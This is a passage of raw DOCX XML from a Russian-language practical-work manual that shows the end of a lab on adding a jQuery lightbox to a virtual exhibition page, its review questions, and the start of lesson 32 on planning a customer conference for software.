          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script type=</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>text/javascript</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> src=</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>script.js</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Еще немного работы:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>// после загрузки страницы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$(document).ready(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$('.pic a').lightBox({</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>imageLoading: 'lightbox/images/loading.gif',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>imageBtnClose: 'lightbox/images/close.gif',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>imageBtnPrev: 'lightbox/images/prev.gif',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>imageBtnNext: 'lightbox/images/next.gif'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>подключаем несколько изображений для правильной работы лайтбокса.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137383" w:rsidRPr="00617AC0" w:rsidRDefault="00137383" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое электронная выставка?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137383" w:rsidRPr="00617AC0" w:rsidRDefault="00137383" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Какие преимущества и недостатки имеются у электронных выставок?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137383" w:rsidRPr="00617AC0" w:rsidRDefault="00137383" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Какие материалы можно использовать на выставке?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00137383" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Что такое PHP и JavaScript?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00137383" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Как разместить на сайте виртуальную выставку?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00137383" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Какие материалы можно использовать на выставке?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB3FFC" w:rsidRPr="00617AC0" w:rsidRDefault="00DB3FFC" w:rsidP="007755F7">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="215" w:name="_Toc507788272"/>
      <w:bookmarkStart w:id="216" w:name="_Toc507788547"/>
      <w:bookmarkStart w:id="217" w:name="_Toc26278751"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Практичес</w:t>
      </w:r>
      <w:r w:rsidR="00CF0A98" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>кое занятие № 32</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Разработка проекта покупательской конференции программного обеспечения отраслевой направленности</w:t>
      </w:r>
      <w:bookmarkEnd w:id="215"/>
      <w:bookmarkEnd w:id="216"/>
      <w:bookmarkEnd w:id="217"/>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>формирование навыков продвижения программного обеспечения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Оборудование: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>персональный компьютер.</w:t>
      </w:r>
      <w:r w:rsidR="00885449" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Разработка проекта покупательской конференции программного обеспечения отраслевой направленности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00885449" w:rsidRPr="00617AC0" w:rsidRDefault="00885449" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание </w:t>
      </w:r>
      <w:r w:rsidR="007363E8" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Спланировать проведение покупательской конференции и подготавливает необходимые материалы для ее проведения согласно методическим рекомендациям из теоретической части. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Темой конференции является программное обеспечение являющееся темой предыдущих работ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00885449" w:rsidRPr="00617AC0" w:rsidRDefault="00885449" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет, в котором содержатся этапы подготовки к конференции.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Конференция покупательская - Элемент маркетинга, массовое мероприятие, в котором участвуют потенциальные покупатели новой продукции. На конференции представители производителя сообщают покупателям сведения о преимуществах продукции, ее технических характеристиках, сферах наиболее рационального применения, правилах пользования и эксплуатации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Как правило, покупательская конференция необходима для рекламы новой технически сложной машиностроительной продукции, использование которой требует первоначального навыка и знаний. Покупательская конференция позволяет изготовителям контактировать непосредственно с потенциальными покупателями их продукции, и за счет этого эффективность конференций довольно существенна. Вместе с тем покупательская конференция в отличие от других рекламных мероприятий не может охватить большой круг потребителей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Первичная цель любого бизнеса – прибыль. Она формируется в результате продаж, которые, в свою очередь, являются результатом контактов. Поэтому количество конференций как средства коммерческой коммуникации во всем мире стремительно увеличивается.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Многие компании рассматривают рынок event-услуг не только с точки зрения потенциальных участников-покупателей, но и в качестве основных игроков-организаторов. Все чаще семинар, конференция и т.п. используются как важная составная часть комплекса маркетинга компании либо как средство получения дополнительного дохода. Однако многие, выходя на этот рынок, не представляют всего огромного объема работ, который необходимо выполнить, чтобы, в конце концов, добиться успеха.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Многие еще в старые, докапиталистические времена участвовали в подобных мероприятиях: кто – в научных, кто – в комсомольских, партийных или профсоюзных.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">И как-то все это выглядело легко и просто. Собрались, </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>потусовались</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, кто-то выступил, задали вопросы, обсудили, приняли решение, отметили это дело и разошлись-разъехались. Работа организаторов обычно оставалась </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>за кадром</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Как любая сфера бизнеса, организация семинара, конференции, форума и т.п. имеет общее и частное.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Общее вполне понятно. Это – цель (заработать денег, продвинуть свою компанию на рынке, раскрутить какой-то товар и т.п.), средства ее достижения (формирование бюджета, реклама, организация продаж, бухгалтерская отчетность и т.д.), план действий и его реализация. Об этом мы, разумеется, тоже поговорим далее.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Однако в этой сфере предостаточно и частного. Именно этому аспекту постараемся уделить главное внимание.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Давайте же </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>заглянем за кулисы</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и последовательно пройдемся по всем этапам этого нелегкого, на самом деле, пути: от замысла – до воплощения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если мероприятие достаточно крупное, особенно с привлечением сторонних организаций, то каждый партнер делегирует своего представителя (менеджера проекта) в общее дело. Таким образом</w:t>
      </w:r>
      <w:r w:rsidR="00885449" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> формируется так называемая рабочая группа. Именно она является тем двигателем, который должен вытянуть весь проект.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Формирование рабочей группы – очень важный момент, поскольку именно от нее, от отношения ее участников к делу, зависит, в значительной мере, конечный успех или провал.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Не забудьте, разумеется, что в такой группе должен быть определен руководитель. Как правило, им становится либо наиболее опытный член рабочей группы, либо ответственный представитель из ведущей фирмы-организатора, имеющий право принимать решения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Именно рабочая группа должна реализовать самый важный и самый тяжелый первый этап подготовки мероприятия.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рабочая группа подбирает партнеров; кроме того, она должна сформировать главный руководящий орган мероприятия – Организационный комитет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ей необходимо если не выработать, то отшлифовать ключевые идеи, разработать концепцию мероприятия.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Наконец, после этого она тянет весь воз задач, которые нужно решить для того, чтобы мероприятие успешно состоялось. Начнем с самого общего. У вашей (как и у любой другой) компании должна быть стратегия, т.е. некоторая глобальная, но конкретная (по времени достижения и по результату) цель, к которой можно приблизиться в ходе достижения других, менее значительных целей. Не забывайте классику – </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>любой ветер не будет попутным, если не знаешь, куда плыть</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
